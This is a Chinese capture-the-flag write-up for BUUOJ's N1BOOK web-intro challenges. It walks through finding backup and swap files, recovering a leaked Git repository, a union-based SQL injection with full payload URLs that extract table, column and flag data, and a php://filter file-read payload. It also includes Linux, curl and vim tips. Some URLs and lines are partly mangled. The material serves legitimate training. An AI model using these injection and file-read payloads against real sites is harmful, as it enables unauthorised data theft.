BUUCTFN1BOOK配套题⽬⽬录
今天上线BUUOJ的时候发现多了⼀栏N1BOOK。
php文件下载源码持续更新中~
[第⼀章 web⼊门]常见的搜集
扫⼀下
发现存在,index.php~,.index.php.swp三个⽂件,分别存放了flag的3个部分
<:告诉爬⾍哪些页⾯可以爬取
index.php~:php的备份有两种:*.php~和*.php.bak
.index.php.swp:当vim出现异常会产⽣.swp⽂件,可以通过vim -r .index.php.swp恢复⽂件
linux操作
这边也顺便记录下linux下的⼀些操作
在linux下,.开头的⽂件是隐藏⽂件,需要ls -a可以查看
rm -f删除⽂件(force的意思)不提⽰任何信息直接删除
wget命令从url下载⽂件
wget de3.buuoj/.index.php.swp
curl命令
curl -O de3.buuoj/.index.php.swp
-o
-o参数将服务器的回应保存成⽂件,等同于wget命令。
curl -o example.html ample
上⾯命令将ample保存成example.html。
-O
-O参数将服务器回应保存成⽂件,并将 URL 的最后部分当作⽂件名。
curl -O ample/foo/bar.html
上⾯命令将服务器回应保存成⽂件,⽂件名为bar.html。
vim常⽤指令
常⽤退出命令
先ESC跳到命令模式
然后
:w(保存⽂件不退出)
:w!(强制保存不退出)
:
wq(保存并退出)
:wq!(强制保存并退出)
:q(不保存退出)
:q!(不保存强制退出)
:e!(放弃修改,从上次保存⽂件开始再编辑)
常⽤插⼊命令
i 在当前位置⽣前插⼊
I 在当前⾏⾸插⼊
a 在当前位置后插⼊
A 在当前⾏尾插⼊
o 在当前⾏之后插⼊⼀⾏
O 在当前⾏之前插⼊⼀⾏
常⽤查命令
/flag 回车后查flag,按n键查下⼀个
[第⼀章 web⼊门]粗⼼的⼩李
没什么好说的,Git源码泄露
python2.7 git_extract.py de3.buuoj/.git/
源码⾥index.html到flag
[第⼀章 web⼊门]SQL注⼊-1
存在字符型注⼊
⽤union select测试哪⼀列有回显
de3.buuoj/index.php?id=-1%27%20union%20select%201,2,3--+
开始注⼊
查表名
de3.buuoj/index.php?id=-1%27%20union%20select%201,group_concat(table_name),1%20fr om%20information_schema.tables%20where%20table_schema=database()--+
查列名
de3.buuoj/index.php?id=-1%27%20union%20select%201,group_concat(column_name),1%2 0from%lumns%20where%20table_name=%27fl4g%27--+
查flag
de3.buuoj/index.php?id=-1%27%20union%20select%201,fllllag,1%20from%20fl4g--+ [第⼀章 web⼊门]afr_1
伪协议读取
de3.buuoj/?p=php://filter/read=convert.base64-encode/resource=flag
base64解码得到flag